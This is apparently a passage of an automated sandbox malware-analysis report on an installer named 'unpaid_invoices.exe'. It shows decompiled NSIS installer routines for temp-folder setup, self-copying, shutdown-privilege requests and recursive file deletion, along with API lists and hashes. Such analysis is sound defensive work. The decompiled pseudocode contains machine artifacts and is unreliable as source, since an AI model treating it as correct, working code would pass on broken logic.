									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ") {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\jones\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe", 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































              0x00403654
              0x00403655
              0x0040365c
              0x0040365f
              0x00403666
              0x00403669
              0x0040367c
              0x00403682
              0x00403685
              0x00403688
              0x00403696
              0x0040369e
              0x004036a9
              0x004036c2
              0x004036c4
              0x004036cc
              0x004036cc
              0x004036d7
              0x004036d9
              0x004036d9
              0x004036ee
              0x00403713
              0x00403721
              0x00403724
              0x0040372b
              0x00403732
              0x00403732
              0x0040372b
              0x00403734
              0x00403739
              0x0040373a
              0x00403746
              0x0040374a
              0x00403751
              0x0040375f
              0x00403764
              0x0040376b
              0x0040376f
              0x00403773
              0x00403775
              0x00403775
              0x00403773
              0x0040377c
              0x00403783
              0x00403789
              0x004037a1
              0x004037b1
              0x004037b6
              0x004037bc
              0x004037c3
              0x004037ca
              0x004037cc
              0x004037cd
              0x004037d7
              0x004037de
              0x004037e0
              0x004037e2
              0x004037e2
              0x004037f5
              0x004037f7
              0x004038f1
              0x004038f1
              0x004038f4
              0x004038f7
              0x00000000
              0x00000000
              0x00403801
              0x00403802
              0x00403805
              0x0040380e
              0x0040380e
              0x00403811
              0x00403814
              0x00403817
              0x0040381a
              0x0040381a
              0x0040381a
              0x0040381b
              0x0040381f
              0x004038df
              0x004038e8
              0x004038ea
              0x004038ed
              0x004038f0
              0x004038f0
              0x004038f0
              0x00000000
              0x00403825
              0x00403826
              0x00403827
              0x0040382b
              0x00403845
              0x0040384c
              0x0040385f
              0x00403860
              0x00403875
              0x0040387a
              0x0040387c
              0x0040387e
              0x0040389a
              0x004038a1
              0x004038b4
              0x004038b5
              0x004038ca
              0x004038d0
              0x004038d2
              0x004038d4
              0x004038dc
              0x004038de
              0x00000000
              0x004038de
              0x004038d8
              0x004038da
              0x004038ff
              0x00403903
              0x0040390c
              0x00403911
              0x00403917
              0x00403922
              0x00403924
              0x00403929
              0x0040392b
              0x00403983
              0x00403988
              0x00403991
              0x00403998
              0x0040399b
              0x00403b72
              0x00403b72
              0x00403b77
              0x00403b80
              0x00403b9d
              0x00403c15
              0x00403c15
              0x00403c1d
              0x00403c1f
              0x00403c1f
              0x00403c25
              0x00403c25
              0x00403bb4
              0x00403bc0
              0x00403bd1
              0x00403bd8
              0x00403bdf
              0x00403bdf
              0x00403be7
              0x00403bf3
              0x00403c01
              0x00403c0c
              0x00000000
              0x00000000
              0x00000000
              0x00403bf5
              0x00403bf5
              0x00403bf6
              0x00403bf8
              0x00403bf9
              0x00403bfa
              0x00403bff
              0x00403c0e
              0x00403c10
              0x00000000
              0x00403c10
              0x00000000
              0x00403bff
              0x00403bf3
              0x00403b8a
              0x00403b91
              0x00403b91
              0x004039a7
              0x00403a4e
              0x00403a4e
              0x00403a5a
              0x00000000
              0x00403a5a
              0x004039b8
              0x004039c0
              0x00403a12
              0x00403a12
              0x00403a18
              0x00403a1f
              0x00403a6d
              0x00403a6f
              0x00403a74
              0x00403a76
              0x00403a7e
              0x00403a7e
              0x00403a89
              0x00403a8e
              0x00403a95
              0x00403a9b
              0x00403a9d
              0x00403b70
              0x00403b70
              0x00403b70
              0x00000000
              0x00403aa3
              0x00403aa3
              0x00403aa5
              0x00403aa6
              0x00403aaf
              0x00403aa8
              0x00403aa8
              0x00403aa8
              0x00403ab5
              0x00403abd
              0x00403ac4
              0x00403acc
              0x00403acc
              0x00403ad9
              0x00403ae5
              0x00403aef
              0x00403aef
              0x00403af1
              0x00403af8
              0x00403b02
              0x00403b0e
              0x00403b14
              0x00403b1a
              0x00403b1d
              0x00403b27
              0x00403b2d
              0x00403b2f
              0x00403b33
              0x00403b44
              0x00403b4a
              0x00403b4f
              0x00403b51
              0x00403b54
              0x00403b5a
              0x00403b5a
              0x00403b51
              0x00403b2f
              0x00403b5d
              0x00403b64
              0x00403b64
              0x00403b64
              0x00403b64
              0x00403b6b
              0x00000000
              0x00403b6b
              0x00403a9d
              0x00403a21
              0x00403a24
              0x00403a28
              0x00403a2d
              0x00403a2f
              0x00000000
              0x00000000
              0x00403a3b
              0x00403a46
              0x00403a4b
              0x00000000
              0x00403a4b
              0x004039c9
              0x004039e1
              0x004039f2
              0x004039f3
              0x004039f7
              0x004039f9
              0x00403a07
              0x00403a0e
              0x00000000
              0x00000000
              0x00000000
              0x00403a0e
              0x00403a10
              0x00000000
              0x00403a10
              0x00403933
              0x0040393f
              0x00403944
              0x00403949
              0x0040394b
              0x00000000
              0x00000000
              0x00403953
              0x0040395b
              0x0040396c
              0x00403974
              0x00403976
              0x0040397b
              0x0040397d
              0x00000000
              0x00000000
              0x00000000
              0x0040397d
              0x00000000
              0x004038da
              0x00403883
              0x00403885
              0x00000000
              0x00000000
              0x00403887
              0x0040388b
              0x0040388f
              0x00403896
              0x00403896
              0x00403896
              0x00403896
              0x00000000
              0x00403896
              0x00403891
              0x00403894
              0x00000000
              0x00000000
              0x00000000
              0x00403894
              0x0040382d
              0x00403831
              0x00403834
              0x0040383b
              0x0040383b
              0x00000000
              0x0040383b
              0x00403836
              0x00403839
              0x00000000
              0x00000000
              0x00000000
              0x00403839
              0x00000000
              0x00000000
              0x00000000
              0x00403807
              0x00403807
              0x00403808
              0x00403809
              0x00403809
              0x00000000
              0x00403807
              0x00000000

              APIs
              • SetErrorMode.KERNELBASE(00008001), ref: 00403669
              • GetVersionExW.KERNEL32(?), ref: 00403692
              • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
              • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
              • OleInitialize.OLE32(00000000), ref: 00403783
              • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
              • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\unpaid_invoices.exe" ,00000020,"C:\Users\user\Desktop\unpaid_invoices.exe" ,00000000), ref: 004037EF
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
              • DeleteFileW.KERNELBASE(1033), ref: 00403988
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
                • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\unpaid_invoices.exe" ,00000000,?), ref: 00403A95
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
              • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
              • CopyFileW.KERNEL32(C:\Users\user\Desktop\unpaid_invoices.exe,0079F748,00000001), ref: 00403B27
              • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
              • ExitProcess.KERNEL32(?), ref: 00403B72
              • OleUninitialize.OLE32(?), ref: 00403B77
              • ExitProcess.KERNEL32 ref: 00403B91
              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
              • ExitWindowsEx.USER32 ref: 00403C04
              • ExitProcess.KERNEL32 ref: 00403C25
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
              • String ID: "C:\Users\user\Desktop\unpaid_invoices.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\unpaid_invoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 2292928366-757432626
              • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
              • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
              • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
              • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 390 405d7a-405da0 call 406045 393 405da2-405db4 DeleteFileW 390->393 394 405db9-405dc0 390->394 395 405f36-405f3a 393->395 396 405dc2-405dc4 394->396 397 405dd3-405de3 call 40666e 394->397 399 405ee4-405ee9 396->399 400 405dca-405dcd 396->400 403 405df2-405df3 call 405f89 397->403 404 405de5-405df0 lstrcatW 397->404 399->395 402 405eeb-405eee 399->402 400->397 400->399 405 405ef0-405ef6 402->405 406 405ef8-405f00 call 4069a4 402->406 407 405df8-405dfc 403->407 404->407 405->395 406->395 414 405f02-405f16 call 405f3d call 405d32 406->414 410 405e08-405e0e lstrcatW 407->410 411 405dfe-405e06 407->411 413 405e13-405e2f lstrlenW FindFirstFileW 410->413 411->410 411->413 415 405e35-405e3d 413->415 416 405ed9-405edd 413->416 432 405f18-405f1b 414->432 433 405f2e-405f31 call 4056d0 414->433 419 405e5d-405e71 call 40666e 415->419 420 405e3f-405e47 415->420 416->399 418 405edf 416->418 418->399 430 405e73-405e7b 419->430 431 405e88-405e93 call 405d32 419->431 422 405e49-405e51 420->422 423 405ebc-405ecc FindNextFileW 420->423 422->419 427 405e53-405e5b 422->427 423->415 426 405ed2-405ed3 FindClose 423->426 426->416 427->419 427->423 430->423 435 405e7d-405e86 call 405d7a 430->435 443 405eb4-405eb7 call 4056d0 431->443 444 405e95-405e98 431->444 432->405 434 405f1d-405f2c call 4056d0 call 40642e 432->434 433->395 434->395 435->423 443->423 446 405e9a-405eaa call 4056d0 call 40642e 444->446 447 405eac-405eb2 444->447 446->423 447->423
              C-Code - Quality: 98%
              			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















              0x00405d84
              0x00405d89
              0x00405d92
              0x00405d95
              0x00405d9d
              0x00405da0
              0x00405da3
              0x00405dab
              0x00405dad
              0x00405dae
              0x00000000
              0x00405dae
              0x00405db9
              0x00405dbc
              0x00405dbc
              0x00405dbc
              0x00405dc0
              0x00405dd3
              0x00405dda
              0x00405ddf
              0x00405de3
              0x00405df3
              0x00405de5
              0x00405deb
              0x00405deb
              0x00405df8
              0x00405dfc
              0x00405e08
              0x00405e0e
              0x00405e13
              0x00405e19
              0x00405e24
              0x00405e2a
              0x00405e2c
              0x00405e2f
              0x00405ed9
              0x00405ed9
              0x00405edd
              0x00405edf
              0x00405edf
              0x00405edf
              0x00405edf
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405e35
              0x00405e35
              0x00405e35
              0x00405e3d
              0x00405e5d
              0x00405e65
              0x00405e6a
              0x00405e71
              0x00405e8c
              0x00405e91
              0x00405e93
              0x00405eb7
              0x00405e95
              0x00405e95
              0x00405e98
              0x00405eac
              0x00405e9a
              0x00405e9d
              0x00405ea5
              0x00405ea5
              0x00405e98
              0x00405e73
              0x00405e79
              0x00405e7b
              0x00405e81
              0x00405e81
              0x00405e7b
              0x00000000
              0x00405e71
              0x00405e3f
              0x00405e47
              0x00000000
              0x00000000
              0x00405e49
              0x00405e51
              0x00000000
              0x00000000
              0x00405e53
              0x00405e5b
              0x00000000
              0x00000000
              0x00000000
              0x00405ebc
              0x00405ec4
              0x00405eca
              0x00405eca
              0x00405ed3
              0x00000000
              0x00405ed3
              0x00405dfe
              0x00405e06
              0x00000000
              0x00000000
              0x00000000
              0x00405dc2
              0x00405dc2
              0x00405dc4
              0x00405ee4
              0x00405ee6
              0x00405ee9
              0x00405f3a
              0x00405f3a
              0x00405f3a
              0x00405eeb
              0x00405eee
              0x00405ef9
              0x00405efe
              0x00405f00
              0x00000000
              0x00000000
              0x00405f03
              0x00405f0f
              0x00405f14
              0x00405f16
              0x00000000
              0x00405f31
              0x00405f18
              0x00405f1b
              0x00000000
              0x00000000
              0x00405f20
              0x00000000
              0x00405f27
              0x00405ef0
              0x00405ef0
              0x00000000
              0x00405ef0
              0x00405dca
              0x00405dcd
              0x00000000
              0x00000000
              0x00000000
              0x00405dcd

              APIs
              • DeleteFileW.KERNELBASE(?,?,76CDFAA0,76CDF560,00000000), ref: 00405DA3
              • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E14
              • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E24
              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
              • FindClose.KERNELBASE(00000000), ref: 00405ED3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: .$.$\*.*
              • API String ID: 2035342205-3749113046
              • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
              • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
              • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
              • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}




              0x004069af
              0x004069b8
              0x00000000
              0x004069c5
              0x004069bb
